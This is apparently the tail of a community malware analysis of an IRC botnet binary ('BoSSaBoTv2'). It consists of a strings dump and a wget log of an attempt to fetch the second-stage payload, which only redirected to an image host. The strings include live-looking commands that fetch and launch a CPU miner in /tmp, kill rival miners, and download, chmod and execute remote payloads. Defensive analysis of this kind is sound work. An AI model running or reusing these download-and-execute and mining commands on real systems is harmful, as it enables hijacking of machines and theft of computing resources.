  620. 000000007880   SHELL
  621. 0000000078E0   NOTICE %s :
  622. 0000000078F4   DISCONNECTED
  623. 000000007960   NOTICE %s :
  624. 0000000079A0   NOTICE %s :
  625. 0000000079B4   SOCKET
  626. 0000000079BD   ERROR
  627. 0000000079E0   NOTICE %s :
  628. 0000000079F4   PROXY
  629. 0000000079FC   SERVER
  630. 000000007A05   READY
  631. 000000007A20   400 : BAD REQUEST
  632. 000000007A32   ONLY GET REQUESTS ARE ALLOWED
  633. 000000007A60   GET %s HTTP/1.0
  634. 000000007A71   Host: %s
  635. 000000007A7B   If-Modified-Since: %s
  636. 000000007A92   Connection: close
  637. 000000007AC0   GET %s HTTP/1.0
  638. 000000007AD1   Host: %s
  639. 000000007ADB   Connection: close
  640. 000000007B00   NOTICE %s :
  641. 000000007B14   SOCKS5
  642. 000000007B1D   SERVER
  643. 000000007B26   READY
  644. 000000007B33   PORT %d
  645. 000000007B40   export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
  646. 000000007B80   NICK %s
  647. 000000007B88   USER %s localhost localhost :%s
  648. 000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
  649. 000000007C20   pkill minerd ; pkill m32 ; pkill m64
  650. 000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
  651. 000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
  652. 000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s
  653. 000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
  654. 000000007E00   NOTICE %s :
  655. 000000007E1D   BoSSaBoTv2-%s
  656. 000000007E60   NOTICE %s :Nick cannot be larger than 9 characters.
  657. 000000008361   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  658. 000000008394   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  659. 0000000083C7   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  660. 0000000083FA   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  661. 00000000842D   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  662. 000000008460   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  663. 000000008493   .shstrtab
  664. 00000000849D   .interp
  665. 0000000084A5   .note.ABI-tag
  666. 0000000084B3   .hash
  667. 0000000084B9   .dynsym
  668. 0000000084C1   .dynstr
  669. 0000000084C9   .gnu.version
  670. 0000000084D6   .gnu.version_r
  671. 0000000084E5   .rel.dyn
  672. 0000000084EE   .rel.plt
  673. 0000000084F7   .init
  674. 0000000084FD   .text
  675. 000000008503   .fini
  676. 000000008509   .rodata
  677. 000000008511   .eh_frame
  678. 00000000851B   .data
  679. 000000008521   .dynamic
  680. 00000000852A   .ctors
  681. 000000008531   .dtors
  682. 000000008547   .comment
  683.  
  684. # Fetching the second-stage payload URL observed from the dropper
  685. # (wget debug log, 2014-08-26):
  686.  
  687. --2014-08-26 23:25:20--  http://con32.cz.cc/4L2nJG5VxX
  688. Resolving con32.cz.cc (con32.cz.cc)... 192.95.12.34
  689. Caching con32.cz.cc => 192.95.12.34
  690. Connecting to con32.cz.cc (con32.cz.cc)|192.95.12.34|:80... connected.
  691.  
  692. GET /4L2nJG5VxX HTTP/1.1
  693.  
  694. ---response begin---
  695. HTTP/1.1 302 Found
  696. Date: Tue, 26 Aug 2014 14:24:18 GMT
  697. Server: Apache/2.4.6 (Linux/SUSE)
  698. X-Powered-By: PHP/5.4.20
  699. Location: http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX
  700. Content-Length: 0
  701. Keep-Alive: timeout=15, max=100
  702. Connection: Keep-Alive
  703. Content-Type: text/html; charset=UTF-8
  704. 302 Found
  705.  
  706. Location: http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX [following]
  707. --2014-08-26 23:25:21--  http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX
  708. conaddr is: 192.95.12.34
  709. Resolving www.bilder-upload.eu (www.bilder-upload.eu)... 94.23.195.180
  710. Caching www.bilder-upload.eu => 94.23.195.180
  711. Found www.bilder-upload.eu in host_name_addresses_map (0x2880d1a0)
  712. Connecting to www.bilder-upload.eu (www.bilder-upload.eu)|94.23.195.180|:80... connected.
  713.  
  714. ---response begin---
  715. HTTP/1.1 302 Found
  716. Date: Tue, 26 Aug 2014 14:25:22 GMT
  717. Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
  718. Location: http://www.bilder-upload.eu/
  719. Vary: Accept-Encoding
  720. Content-Length: 212
  721. Keep-Alive: timeout=15, max=100
  722. Connection: Keep-Alive
  723. Content-Type: text/html; charset=iso-8859-1
  724. 302 Found
  725. URI content encoding = 'iso-8859-1'
  726. Location: http://www.bilder-upload.eu/ [following]
  727. <html><head>
  728. <title>302 Found</title>
  729. </head><body>
  730. <h1>Found</h1>
  731. <p>The document has moved <a href="http://www.bilder-upload.eu/">here</a>.</p>
  732. </body></html>
  733. ] done.
  734.  
  735. --2014-08-26 23:25:22--  http://www.bilder-upload.eu/
  736. Reusing existing connection to www.bilder-upload.eu:80.
  737.  
  738. ---request begin---
  739. GET / HTTP/1.1
  740. Accept: */*
  741. Host: www.bilder-upload.eu
  742. Connection: Keep-Alive
  743. HTTP request sent, awaiting response...
  744.  
  745. ---response begin---
  746. HTTP/1.1 200 OK
  747. Date: Tue, 26 Aug 2014 14:25:22 GMT
  748. Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
  749. X-Powered-By: PHP/5.2.6-1+lenny16
  750. Set-Cookie: PHPSESSID=2f47551d255e0b695257fc022a155c0a; path=/
  751. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  752. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  753. Pragma: no-cache
  754. Vary: Accept-Encoding
  755. Keep-Alive: timeout=15, max=99
  756. Connection: Keep-Alive
  757. Transfer-Encoding: chunked
  758. Content-Type: text/html
  759. 200 OK
  760.  
  761. Stored cookie www.bilder-upload.eu -1 (ANY) / <session> <insecure> [expiry none] PHPSESSID 2f47551d255e0b695257fc022a155c0a
  762. Length: unspecified [text/html]
  763. Saving to: '4L2nJG5VxX'
  764. 2014-08-26 23:25:23 (31.1 KB/s) - '4L2nJG5VxX' saved [8464]
  765.  
  766.  
  767. #
  768. # Result: the payload URL only redirected (302 -> bilder-upload.eu image thumbnail -> site front page), so the 8464-byte file saved as '4L2nJG5VxX' is the image host's HTML front page (Content-Type: text/html), not the ELF payload — the hosted file had apparently already been removed at analysis time. Only the tail of that HTML is kept here:
  769. #
  770.  
  771. >Mit dem hochladen der Datei akzeptieren Sie unsere AGB.<
  772. </form>
  773.  
  774.  
  775. ----
  776. #MalwareMustDie!